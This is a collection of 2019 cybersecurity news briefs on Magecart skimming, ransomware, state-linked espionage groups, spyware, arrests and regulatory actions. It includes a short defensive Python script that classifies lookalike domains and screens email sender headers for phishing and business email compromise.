A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library that Volusion provides to its client shops. The injected code loaded a second script hosted on Google's cloud storage service. That script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated into it. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
Magecart Threat Group Tied to Cobalt Cyber Attackers (10/07/2019)
RiskIQ has warned that Magecart is becoming a serious threat, as its skimmers have been detected over two million times and have breached over 18,000 hosts. Magecart's average breach length is 22 days, and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in the email addresses used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
Moroccan Human Rights Activists Targeted by NSO Group Spyware (10/10/2019)
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israel-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that, if clicked, would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to sell its spyware only to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
US Businesses, Consumers Threatened by Targeted Ransomware Attacks (10/07/2019)
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol weaknesses, and software vulnerabilities to compromise consumers and companies and to make their ransomware attacks more effective.
China Hacked Aviation Companies to Get Intel to Build C919 Airplane (10/14/2019)
Chinese hackers coordinated a multi-year campaign to obtain information on the components used in the Comac C919 aircraft, which costs less than its competitors and made its maiden flight in 2017 following years of delays due to design flaws. CrowdStrike released a report that the Chinese state-aligned adversary TURBINE PANDA conducted cyber intrusions from roughly 2010 to 2015 against several of the companies that make the C919's various components. The goal was to obtain all the intelligence needed to manufacture the C919 components in China. The campaign included two parts: actual hacking and recruiting employees who worked at the targeted aviation companies. Among those targeted and compromised were Safran Group, Honeywell, and GE. According to the analysis, "Beijing uses a multifaceted system of forced technology transfer, joint ventures, physical theft of intellectual property from insiders, and cyber-enabled espionage to acquire the information it needs."
Hacker Arraigned in Cryptocurrency Scheme that Netted $1.4 Million (10/14/2019)
Alleged hacker Anthony Tyler Nashatka was arraigned in federal court on charges of conspiracy to commit computer fraud and abuse, conspiracy to commit wire fraud, aggravated identity theft, and other charges related to a scheme to defraud victims of at least $1.4 million USD in cryptocurrency in December 2017, the Department of Justice (DOJ) announced. According to an indictment, Nashatka conspired to target a cryptocurrency exchange platform to obtain the private keys and other information of hundreds of its users as part of a scheme to steal the users' cryptocurrency. The indictment further describes how the defendants unlawfully used the identity of a victim to gain access to the platform's domain name settings, caused the transmission of a command to disable all of the cryptocurrency company's servers, diverted users from the actual platform to a fake Web site, and fraudulently induced victims to input their cryptocurrency addresses and private keys into the fake Web site.
Imperva Breach Blamed on Leaky Cloud Configuration (10/14/2019)
Imperva admitted that a misconfiguration is to blame for a security breach affecting "a subset" of its Cloud Web Application Firewall (WAF) customers. Kunal Anand, Imperva's chief technology officer, said, "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS (Amazon Web Services) accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords." The breach was discovered in August, and the incident is not related to a vulnerability in the Cloud WAF product.
Kaspersky Honeypots Detected 105 Million IoT Device Attacks in First Half of 2019 (10/15/2019)
Kaspersky honeypots detected 105 million attacks on Internet of Things (IoT) devices coming from 276,000 unique IP addresses in the first six months of 2019, a figure nearly nine times greater than the number found in the same period of 2018. The findings come from Kaspersky's IoT: A Malware Story report on honeypot activity in H1 2019. The report found that attacks on IoT devices are generally not sophisticated but are stealthy, leaving users unaware that their devices are being exploited. The Mirai malware was used in 39% of the attacks while Nyadrop was seen in 38.57% of attacks.
Pitney Bowes Services Impacted by Cyber Attack (10/15/2019)
A ransomware attack hit Pitney Bowes, resulting in encrypted information and disrupted access for clients, the shipping services company said in a statement. "We have seen no evidence that customer accounts or data have been impacted," the company said. Customers will not be able to refill postage meters but can print postage if they have funds loaded in the system. Mailing system products and Your Account access are impacted by this attack.
TA407 Threat Group Goes Phishing at Universities (10/14/2019)
Investigation into the TA407 (also known as Silent Librarian, Cobalt Dickens, and Mabna Institute) threat actor shows that it is targeting phishing attacks at specific universities in North America and Europe. TA407 uses well-crafted social engineering mechanisms including stolen university branding, fake email signatures, credentials and addresses, university-specific email bodies and portal clones, and themed subject lines. Proofpoint noted that TA407 takes advantage of publicized downtime and weather alerts, among other events, to add credibility to its phishing lures.
Under the Radar: For 4 Years, the Dukes Used New Malware Tools for Cyber Espionage (10/17/2019)
The Dukes (also known as APT29 and Cozy Bear) threat group appeared to take a hiatus, but the entity has reemerged with new malware implants in ongoing activities that ESET has dubbed "Operation Ghost." This campaign, which appears to have become active in 2013 and is ongoing, uses three malware implants - PolyglotDuke, RegDuke, and FatDuke - and has compromised the ministries of foreign affairs of at least three European countries. At least one European country's embassy in Washington, DC has also been affected. In Operation Ghost, the Dukes have used a limited number of tools but have relied on persistence and a sophisticated four-stage malware platform, and have avoided reusing the same command and control infrastructure across different victims.
Winnti Group Updates Threat Arsenal with Additional Malware (10/14/2019)
ESET published details regarding new Winnti Group activities, including that the threat entity uses a packer called PortReuse to target specific organizations. The Winnti Group, which was responsible for the ShadowHammer supply chain attacks, also utilizes a VMProtected packer that decrypts position-independent code using RC5, with a key based on a static string and the volume serial number of the victim's hard drive, and runs it directly. The group uses the ShadowPad malware and a custom version of the XMRig cryptocurrency miner as payloads.
Dots Connected Between Magecart Threat Group and Carbanak Gang (10/23/2019)
Researchers at Malwarebytes have connected the Carbanak threat gang to the Magecart Group 5 cybercriminal group and to Dridex phishing campaigns. Magecart is a group of affiliates who use malicious JavaScript to steal payment data from shoppers, mostly on checkout pages. Magecart Group 5 targets the supply chain used by online merchants. While analyzing Magecart Group 5's domains, Malwarebytes noticed several that connected to Dridex phishing campaigns. Dridex, a well-known banking Trojan, has often been used as an initial infection vector in attacks that deliver the Carbanak malware as the payload. The Carbanak gang uses the malware of the same name.
FTC Takes Action Against Spying Apps (10/23/2019)
The Federal Trade Commission (FTC) has barred the developers of three stalking apps from selling apps that monitor consumers' mobile devices unless they take certain steps to ensure the apps will only be used for legitimate purposes. The FTC alleges that Retina-X and its owner, James N. Johns, Jr., developed three mobile device apps that allowed purchasers to monitor the mobile devices on which they were installed, without the knowledge or permission of the device's user. The apps - known as MobileSpy, PhoneSheriff, and TeenShield - allowed purchasers to access sensitive information about device users, including the user's physical movements and online activities. At the same time, devices on which the apps were installed were exposed to security vulnerabilities.
Ransomware Attack Knocks Billtrust Offline (10/22/2019)
An October 17 malware attack on financial services provider Billtrust resulted in an outage of the company's services, Bleeping Computer reported. Although the company did not publicly acknowledge the attack, customer Wittichen Supply announced that it had been notified by Billtrust of the malware incident. According to Wittichen Supply, no customer data was impacted and services were in the process of being restored from backups. An anonymous source told Bleeping Computer that Billtrust was affected by the BitPaymer ransomware.
Russian Turla Group Stole Malicious Iranian Tools and Infrastructure (10/21/2019)
The National Security Agency (NSA) and the UK's National Cyber Security Center (NCSC) released a joint advisory on the Turla (also known as Waterbug and Venomous Bear) advanced persistent threat group, which is widely thought to be associated with Russia. Previous advisories from the NCSC detailed Turla's use of the Neuron and Nautilus implants and an ASPX-based backdoor alongside the Snake rootkit. Since those advisories were published, analysis of additional victims and infrastructure by the NCSC, the NSA, and partners determined that the Neuron and Nautilus tools were very likely Iranian in origin. Those behind Neuron or Nautilus were almost certainly not aware of, or complicit with, Turla's use of their implants. After acquiring the tools and the data needed to use them operationally, Turla first tested them against victims it had already compromised using its Snake toolkit, and then deployed the Iranian tools directly against additional victims.
Texas Man Receives 12+ Years in Prison for Phishing LA Superior Court (10/24/2019)
A Texas man who was found guilty of hacking into the Los Angeles Superior Court (LASC) computer system, using the system to send approximately two million malicious phishing emails, and fraudulently obtaining hundreds of credit card numbers was sentenced to 145 months in federal prison. The Department of Justice (DOJ) announced that Oriyomi Sadiq Aloba and his co-conspirators targeted the LASC for a phishing attack. During the attack, the email account of one court employee was compromised and used to send phishing emails to coworkers purporting to be from the file-hosting service Dropbox. The email contained a link to a bogus Web site that asked for the users' LASC email addresses and passwords. Thousands of court employees received the Dropbox email, and hundreds disclosed their email credentials to the attacker. The compromised email accounts then were used to send millions of phishing emails.
Anti-Doping, Sporting Organizations Attacked by Strontium/Fancy Bear (10/29/2019)
Microsoft tracked new attacks linked to the Strontium (also known as Sofacy, Fancy Bear, and APT28) threat entity that focused on anti-doping authorities and sporting organizations around the world. At least 16 national and international sporting and anti-doping organizations across three continents were targeted in these attacks, which began September 16. The methods used in the attacks are similar to those previously used by Strontium: spear phishing, password spraying, exploiting Internet-connected devices, and the use of both open-source and custom malware.
Massive Data Dump of Indian Bank Cards Discovered in Joker's Stash (10/29/2019)
Group-IB uncovered a database holding more than 1.3 million credit and debit card records, mostly of Indian banks' customers, that was uploaded to Joker's Stash on October 28. The underground market value of the database is estimated at more than $130 million USD. Joker's Stash is an underground credit card shop. This particular dump, in which 98% of the cards belong to Indian banks, can be used to produce cloned cards for further cashouts.
Ongoing Phishing Attack Targeting UN and Humanitarian Organizations (10/29/2019)
Lookout has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but the attack is still ongoing. The infrastructure connected to this attack has been live since March. Two domains, session-services[.]com and service-ssl-check[.]com, have been hosting the phishing content and resolved to two IP addresses over the course of the campaign. The phishing pages include keylogging and mobile-aware functionality.
Researchers Dive into Hacking Forum to Learn More about Rig EK (10/29/2019)
While researching a malware sample spread by the Rig exploit kit (EK), researchers at Check Point Software were led to the HackForums underground market, where they learned about the hacking community and the EK itself in some detail. The researchers found that a new hacker can easily start up a business after joining an underground forum and buying different cyber attack products. Additionally, Rig EK operators are actively reselling the exploitation service to different customers on different "flows" and providing them with a Rig public statistics link. This allows customers to re-resell the service to their own customers and distribute whatever malware variant they have.
Steam Gamers Victimized by Fake, Yet Legitimate Looking Online Stores (10/29/2019)
A phishing scam targeting users of the Steam online gaming platform has spiked since June, the researchers at Kaspersky say. Attackers lure users to sites that mimic or copy online stores linked to Steam that sell in-game items. The fake resources are high-quality, making it difficult to distinguish them from the real thing.
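Fake storefronts of this kind, like the lookalike sender domains used in business email compromise, generally sit on domains that differ from the real one by a confusable character, an added word or a swapped TLD. The following Python check is an added example rather than anything from Kaspersky's research: it screens a domain against a list of trusted ones and names the kind of deviation it finds, and it also applies the same check to the From and Reply-To domains of an email. All domain names and thresholds are constructed for illustration, and the registrable-domain split assumes a one-label TLD.

```python
"""Classify a domain against trusted ones to catch lookalikes used for phishing stores and BEC."""
from email.utils import parseaddr

# Constructed trusted domains: a storefront and a business correspondent (stand-ins, not real sites).
TRUSTED_DOMAINS = {"gamestore-market.com", "acme-vc.com"}

# Visually confusable substitutions commonly used when registering lookalike domains.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))

# Minimum trusted label length for the "trusted name embedded in a longer name" rule,
# so that very short names do not match everything.
MIN_AFFIX_LABEL = 5


def registrable(domain: str) -> tuple:
    """Split into (second-level label, tld). Assumes a one-label public suffix;
    a real deployment would use the public suffix list."""
    labels = domain.lower().strip().rstrip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def normalize(label: str) -> str:
    """Fold confusables and drop hyphens so that 'acrne-vc' compares equal to 'acmevc'."""
    label = label.lower()
    for lookalike, real in CONFUSABLES:
        label = label.replace(lookalike, real)
    return label.replace("-", "")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a single rolling row."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


def classify_domain(domain: str, trusted: set = TRUSTED_DOMAINS) -> str:
    """Return 'trusted', 'unrelated', or 'lookalike:<reason>' for a domain.

    Subdomains of a trusted domain are trusted; every other domain is compared
    with each trusted registrable name after confusable folding."""
    domain = domain.lower().strip().rstrip(".")
    sld, tld = registrable(domain)
    if domain in trusted or f"{sld}.{tld}" in trusted:
        return "trusted"
    norm = normalize(sld)
    for t in sorted(trusted):
        tsld, ttld = registrable(t)
        tnorm = normalize(tsld)
        if norm == tnorm:
            return "lookalike:tld-swap" if tld != ttld else "lookalike:confusable"
        if len(tnorm) >= MIN_AFFIX_LABEL and tnorm in norm:
            return "lookalike:affix"
        # Allow one typo for short names and two for long ones (assumed thresholds).
        max_edits = 1 if len(tnorm) < 8 else 2
        if edit_distance(norm, tnorm) <= max_edits:
            return "lookalike:typo"
    return "unrelated"


def screen_sender(from_header: str, reply_to_header: str = "") -> dict:
    """Classify the From: domain and, when present, the Reply-To: domain,
    which is where a relayed BEC conversation is steered."""
    result = {}
    for field, header in (("from", from_header), ("reply_to", reply_to_header)):
        address = parseaddr(header)[1]
        domain = address.rpartition("@")[2].lower()
        result[field] = (domain, classify_domain(domain)) if domain else None
    return result


if __name__ == "__main__":
    for candidate in ("gamestore-market.com", "gamestore-markets.com", "gamestroe-market.com",
                      "acrne-vc.com", "acme-vc.co", "gmail.com"):
        print(f"{candidate:28} {classify_domain(candidate)}")
    print(screen_sender('"Dana Fund" <dana@acme-vc.com>', "dana@acme-vc.co"))
```

A hit is a reason to hold the message or block the page for review, not proof of fraud on its own: new legitimate partners and vendors regularly share words with existing ones, so the trusted list has to be maintained, and a relayed BEC conversation whose Reply-To stays on the lookalike domain is exactly the case the second function is meant to surface.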
Discovered Server Stockpiled with Malicious Tools Used to Target Industrial Companies (11/05/2019)
Cisco's Talos researchers discovered a server hosting a large stockpile of malicious files. Analysis of these files shows that the attackers were able to obtain a deep level of access to victims' infrastructure, enabling Talos to identify several targets of these attacks, including one American manufacturing company. The server contained a number of malicious files, including the DoppelPaymer ransomware, the TinyPOS credit card scraping malware, and loaders that execute code delivered from the command and control server. The attack targets have been notified. According to the analysis, the attacker appears to be targeting medium-sized companies in the industrial space.
Threat Actors Use Political Likenesses, Names for Malicious Gain (11/06/2019)
Cisco Talos discovered several malware distribution campaigns where the adversaries were utilizing the names and likenesses of prominent political figures, including President Trump, Hillary Clinton, and Vladimir Putin. Some of the applications are designed to coerce victims into paying ransom demands, while others could be used to gain backdoor access to systems and provide attackers the ability to operate within organizational networks.
DOJ Uncovers Major iPhone and iPad Fraud Scheme Operating in California (11/14/2019)
The US Department of Justice (DOJ) has exposed a major iPhone and iPad fraud ring operating out of California. The agency raided two businesses and several homes in Mira Mesa and Mission Hills, California, seizing over $250,000 in cash and 90 iPhones that may include counterfeit parts. Apparently, the operation revolved around acquiring counterfeit iPhones and iPads from China, importing them to the US, and then intentionally breaking those devices and having them replaced, under warranty, by Apple, with genuine iPhones and iPads. The legitimate units were then returned to China for sale. The crime was allegedly perpetrated by three brothers, Zhiwei Loop Liao, Zhimin Liao, and Zhiting Liao, all of whom are considered fugitives at the time of writing. An additional 11 individuals have been charged in the case, which is believed to have moved more than 10,000 iPhones and iPads during its time in operation. According to the DOJ, the ring escaped detection for this long by acquiring legitimate IMEI (International Mobile Equipment Identity) numbers from real Apple products and applying them to the counterfeit devices before turning them in for replacement.
Highly Targeted Campaign of 12 APT33 Botnets Evades Detection (11/13/2019)
The APT33 adversary has been tracked using about 12 command and control servers to narrowly target its attacks, and it implements multiple layers of obfuscation to avoid detection. Trend Micro's researchers observed the campaigns targeting organizations in the Middle East, the US, and Asia. Among the active infections in 2019 are two separate locations of a private American company that offers services related to national security, victims connecting from a university and a college in the US, a victim most likely related to the US military, and several victims in the Middle East and Asia.
Orcus Malware Author Charged in International Scheme (11/12/2019)
The Royal Canadian Mounted Police (RCMP) announced charges against John Paul Revesz of Toronto for allegedly operating an international malware scheme under the company name "Orcus Technologies." An RCMP criminal investigation began in July 2016 after reports of a significant number of computers being infected with a remote access Trojan. A search warrant was executed at the accused's residence in March 2019 and electronic devices were seized and later analyzed. The evidence obtained shows that this malware infected computers around the world, victimizing thousands of people in multiple countries.
Russian National Extradited for Allegedly Running Underground Credit Card Marketplace (11/12/2019)
A Russian national has been extradited to the US to face charges for running a criminal online marketplace that facilitated payment card fraud, computer hacking, and other crimes, the Justice Department (DOJ) announced. Aleksei Burkov allegedly ran a Web site called "Cardplanet" that sold payment card numbers that had been stolen primarily through computer intrusions. Many of the cards offered for sale belonged to US citizens. The stolen data from more than 150,000 compromised payment cards was allegedly sold on Burkov’s site and has resulted in over $20 million USD in fraudulent purchases made on US credit cards. Additionally, Burkov allegedly ran another online cybercrime forum that served as an invite-only club where elite cybercriminals could meet and post in a secure location to plan various cybercrimes, to buy and sell stolen goods and services.
Operator of Illegal Booter Services that Caused DDoS Attacks Receives Prison Term (11/19/2019)
The Justice Department (DOJ) announced that Sergiy P. Usatyuk of Orland Park, IL has been sentenced to 13 months in prison, followed by three years of supervised release, on one count of conspiracy to cause damage to Internet-connected computers for his role in owning, administering, and supporting illegal booter services that launched millions of illegal distributed denial-of-service (DDoS) attacks against victim computer systems in the United States and elsewhere. According to the criminal information, Usatyuk combined with a co-conspirator to develop, control, and operate a number of booter services and booter-related Web sites from around August 2015 through November 2017 that launched millions of DDoS attacks that disrupted the Internet connections of targeted victim computers, rendered targeted Web sites slow or inaccessible, and interrupted normal business operations.
Ransomware Attack Hits Louisiana State Government (11/19/2019)
Louisiana's state government was crippled by a ransomware attack that affected the Office of Motor Vehicles (OMV), the Department of Health, and the Department of Transportation and Development. The attack began on November 18 and resulted in the shuttering of various state Web sites. Some services were shut down as a precautionary measure. According to Fox 8 News, business at all 79 OMV locations came to a halt. An official said that ransomware was to blame but that the state had not paid the ransom, nor did it appear that any key data had been locked. Governor John Bel Edwards tweeted that he had mobilized the state's cybersecurity team to help disrupt the attack.
Veterinary Hospital Company Targeted in Ryuk Ransomware Attack (11/19/2019)
Security researcher Brian Krebs learned that National Veterinary Associates (NVA), a company that owns over 700 animal care facilities around the globe, has been victimized by a ransomware attack that affected more than half of its practices. Although NVA declined to comment on the malware or whether it had paid the ransom, KrebsOnSecurity learned that the incident was discovered on October 27 and that two forensic firms were hired to investigate. An anonymous source told Krebs that the Ryuk ransomware was to blame and that an earlier ransomware attack, which occurred a few months prior, had also involved Ryuk. Approximately 400 NVA locations have been affected.
Customers' Payment Card Data Stolen from Hotels Around the World (12/02/2019)
More than 20 hotels in Latin America, Europe and Asia have fallen victim to targeted malware attacks conducted by several threat entities, including RevengeHotels. The campaign, which has been active since 2015 but has increased its presence since January, involves different groups using traditional remote access Trojans (RATs) to infect businesses in the hospitality sector. Research from Kaspersky shows that at least two groups, RevengeHotels and ProCC, were identified as part of the campaign; however, more cybercriminal groups are potentially involved. The main attack vector is email with crafted malicious documents attached. Some of the documents exploit a Windows vulnerability and load the payload with VBS and PowerShell scripts. The payload then installs customized versions of various RATs and other custom malware, such as ProCC, on the victim's machine, which can later execute commands and set up remote access to the infected systems.
Elaborate Man-in-the-Middle Attack Involves Email Correspondence, Results in $1M Loss (12/05/2019)
Check Point Software uncovered an elaborate business email compromise scheme in which an attacker used highly sophisticated tactics - including email communications - to trick both parties and steal $1 million USD. The case involves two legitimate companies - a Chinese venture capital fund and an Israeli startup - and a wire transfer. After realizing the theft, the startup tapped Check Point for help. Upon analysis, Check Point determined that the attacker had spotted the correspondence between the two companies ahead of the anticipated wire transfer and set up two lookalike domains to resemble the legitimate companies. The attacker then began corresponding with both the venture capital fund and the startup, spoofing the email addresses of each company. Check Point's Matan Ben David said, "This infrastructure gave the attacker the ability to conduct the ultimate Man-In-The-Middle (MITM) attack. Every email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination."
Europol Seizes Insidious IM-RAT that Took Complete Control of Machines (12/02/2019)
A hacking tool that was able to give full remote control of a victim's computer to cybercriminals has been taken down as a result of an international law enforcement operation targeting the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The investigation, led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, resulted in an operation involving numerous judicial and law enforcement agencies. The tool had been used across 124 countries and sold to over 14,000 buyers, but it can no longer be used by anyone who purchased it. The IM-RAT, once installed undetected, gave cybercriminals free rein over the victim's machine. It sold for as little as $25 USD.
Four Million Payment Cards from Breached Restaurants Selling in Hacker Marketplace (11/26/2019)
KrebsOnSecurity reported that four million payment cards gleaned from a breach of four restaurant chains are for sale on the Joker's Stash, a cybercriminal underground market. Two financial industry sources told researcher Brian Krebs that the payment cards had all been used at Krystal, Moe's, McAlister's Deli, and Schlotsky's. Krystal confirmed in October that it had been breached, while the other restaurants are all part of the same parent company and announced breaches in August.
Magecart Splinter Group Uses Phishing and Skimming to Lift Payment Card Data (11/27/2019)
A group affiliated with the Magecart attacks has jumped from phishing to card skimming. The group, dubbed "Fullz House," sells packages of individuals' identifying information (known as "fullz") on its BlueMagicStore site. The group also uses skimming to sell payment card information on its carding store called CardHouse. Fullz House isn't new to the cybercriminal world but it ramped up its activities beginning in August-September. While the two parts of this group's operation are mainly split, there is a slight overlap in its attack infrastructure on domain-to-IP address resolution data. The sales platforms this group operates also have infrastructure overlap with the infrastructure tied to the group's operations that steal cards or payment credentials. RiskIQ has published its analysis of Fullz House. Magecart is not a specific entity but a bunch of splinter groups that all use the same tactics to compromise ecommerce sites and inject scripts to steal payment card data.
Magecart Threat Group Injects Skimmers onto Salesforce's Cloud Platform (12/05/2019)
Malwarebytes spotted a number of skimmers found on Heroku, a container-based, cloud Platform as a Service that is owned by Salesforce. Magecart threat actors are leveraging the service to host their skimmer infrastructure and collect stolen credit card data. Developers can use Heroku to build apps in a variety of languages and deploy them seamlessly at scale. The Magecart thieves were registering free accounts with Heroku to host their skimming business. After Malwarebytes notified Salesforce of the Magecart activity, the instances were removed.
NEC Concludes Agreement with INTERPOL (11/25/2019)
NEC has concluded a global cybersecurity agreement with the International Criminal Police Organization (INTERPOL). This partnership replaces an existing agreement by combining INTERPOL's international network with NEC cybersecurity technology to "assist the investigation and analysis of complex and sophisticated cybercrime" in addition to "strengthening security at an international level."
Operation ENDTRADE Improves Malware Features to Steal Classified Data (12/02/2019)
The TICK (also known as BRONZE BUTLER and REDBALDKNIGHT) threat group has increased its malware development and deployments since November 2018. TICK, which has been active since 2008, has been developing new malware families capable of detection evasion for initial intrusion, as well as escalation of administrative privileges for subsequent attacks and data collection. The group is using legitimate email accounts and credentials for the delivery of the malware, zeroing in on industries with highly classified information: defense, aerospace, chemical, and satellite industries with head offices in Japan and subsidiaries in China. Trend Micro is calling this campaign "Operation ENDTRADE." Further details are available from a white paper published by the vendor.
Scammers Posing as CISA Reps to Extort Money from Victims (12/02/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a phone scam where a caller pretends to be a CISA representative. The scammer claims to have knowledge of the potential victim's questionable behavior and attempts to extort money. CISA advises anyone who receives such a call not to pay any money and to contact a local FBI field office to file a report.
Microsoft announced that its AccountGuard cyber threat detection service, which launched in August 2018, has identified 781 nation-state attacks taking aim at organizations using the service. Ninety-five percent of these attacks have targeted US-based organizations. Many of the attacks were aimed at think tanks and non-governmental organizations that work closely with political parties and election candidates. Microsoft did not elaborate on whether any of the attacks were successful.
The Dutch National Police Unit arrested a Dutch resident suspected of the large-scale production and selling of malware, including Rubella, Cetan and Dryad. The suspect was active in hackers' forums under various names and eventually was tracked down. He is alleged to have created and sold the Rubella Macro Builder toolkit which is used to weaponize Office documents to deliver malicious payloads. McAfee spotted Rubella in the wild and aided in this investigation.
While the operators of the GandCrab ransomware announced they were shuttering their malicious business in June, security researcher Brian Krebs suspects that the threat actors behind it may have reemerged with a new ransomware. KrebsOnSecurity reported that the GandCrab team is most likely behind a program called REvil (also known as Sodin and Sodinokibi). Cisco identified Sodinokibi, which was used to deploy GandCrab while a Dutch firm noticed similarities in how GandCrab and REvil generate URLs within the infection process. Krebs said in a blog post, "My guess is the GandCrab team has not retired, and has simply regrouped and re-branded due to the significant amount of attention from security researchers and law enforcement investigators. It seems highly unlikely that such a successful group of cybercriminals would just walk away from such an insanely profitable enterprise."
A malware framework is responsible for more than one billion fraudulent ad impressions since April, generating its operators significant Google AdSense revenue on a monthly basis. Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams. The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex's browser.
AlienVault has identified an ongoing malware campaign, attributable to the StrongPity (also known as PROMETHIUM) adversary, that began in the second half of 2018. The malware samples appear to have been created and deployed to targets following a toolset rebuild in response to various security vendors reporting on StrongPity's tactics in 2018. One sample is a malicious installer for WinBox, a utility that allows administration of the Mikrotik Router operating system using a simple GUI. Other installers are also being used, including newer versions of WinRAR and a tool called Internet Download Manager which maliciously installs StrongPity and communicates with related adversary infrastructure.
A threat actor dubbed "SWEED" by Cisco's Talos researchers is pushing multiple campaigns that use Formbook, Lokibot, and Agent Tesla malware. SWEED has been in operation since at least 2017 and primarily targets victims with stealers and remote access Trojans. The threat actor has used various techniques to infiltrate its victims, but beginning in 2019, SWEED began leveraging malicious Office macros and using different methods to bypass User Account Control on systems. It is targeting small and medium-sized companies in manufacturing and logistics around the world.
An advisory issued by the UK's National Cyber Security Center highlights Domain Name System hijacking activity and offers remediation methods. According to the advisory, multiple regions and sectors have been victimized by these incidents.
FireEye identified a phishing campaign conducted by APT34, an Iranian threat actor posing as a member of Cambridge University to gain victims' trust to open malicious documents. The campaign used LinkedIn to deliver the malicious documents and organizations in energy/utilities, government, and oil/gas were the targets. APT34 (also known as OilRig and Greenbug) uses a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. FireEye also identified a variant of the Pickpocket browser credential-stealing tool and two new malware families, VALUEVAULT and LONGWATCH, in use by this campaign.
The Department of Education issued an advisory regarding the active and ongoing exploitation of a previously identified vulnerability in the Ellucian Banner system. Attackers can leverage the bug to access the Banner system with an institutional account. The department has identified 62 colleges or universities that have been affected by exploitation of this vulnerability. Additionally, there is information "that indicates criminal elements have been actively scanning the Internet looking for institutions to victimize through this vulnerability and developing lists of institutions for targeting with this exploitation." Banner is an administrative software system designed for higher education institutions. Security researcher Joshua Mulliken detailed the bug in a December 2018 advisory.
Researchers at Wordfence warn of a malvertising campaign which is causing victims' sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads. By exploiting WordPress vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim Web site. When the third party code executes in a visitor's browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user.
Louisiana's governor declared a state of emergency on July 24 due to an ongoing cyber attack that has affected several school districts in the northern part of the state. The Governor's Office of Homeland Security and Emergency Preparedness activated its crisis action team and also the Emergency Services Function-17 to coordinate the response to this cybersecurity incident, which included the FBI and state agencies. Governor John Bel Edwards said, "The state was made aware of a malware attack on a few north Louisiana school systems and we have been coordinating a response ever since."
The Federal Trade Commission (FTC) has imposed a $5 billion USD fine and new restrictions on Facebook as punishment for violating consumers' privacy. The settlement order imposes restrictions on Facebook's business operations, creates multiple channels of compliance, and requires Facebook to restructure its approach to privacy. The social media giant must establish strong mechanisms to ensure that Facebook executives are accountable for the decisions they make about privacy, and that those decisions are subject to meaningful oversight. To encourage users to share information on its platform, Facebook promises users they can control the privacy of their information through the platform's privacy settings. Following a year-long investigation, the FTC found that Facebook repeatedly used deceptive practices to undermine users' privacy preferences. These tactics allowed the company to share users' personal information with third-party apps that were downloaded by the user's Facebook "friends." The FTC alleges that many users were unaware that Facebook was sharing such information, and therefore did not take the steps needed to opt-out of sharing. "Despite repeated promises to its billions of users worldwide that they could control how their personal information is shared, Facebook undermined consumers' choices," said FTC Chairman Joe Simons. "The magnitude of the $5 billion penalty and sweeping conduct relief are unprecedented in the history of the FTC. The relief is designed not only to punish future violations but, more importantly, to change Facebook's entire privacy culture to decrease the likelihood of continued violations." The $5 billion penalty is the largest ever imposed on any company for violating consumers' privacy.
Former National Security Agency (NSA) contractor Harold Martin has been sentenced to nine years in prison for stealing highly classified national defense information for almost 20 years, the Justice Department (DOJ) announced. Beginning in the late 1990s and continuing through August 2016, Martin stole and retained government property from secure locations and computer systems, including documents in both hard copy and digital form relating to national defense.
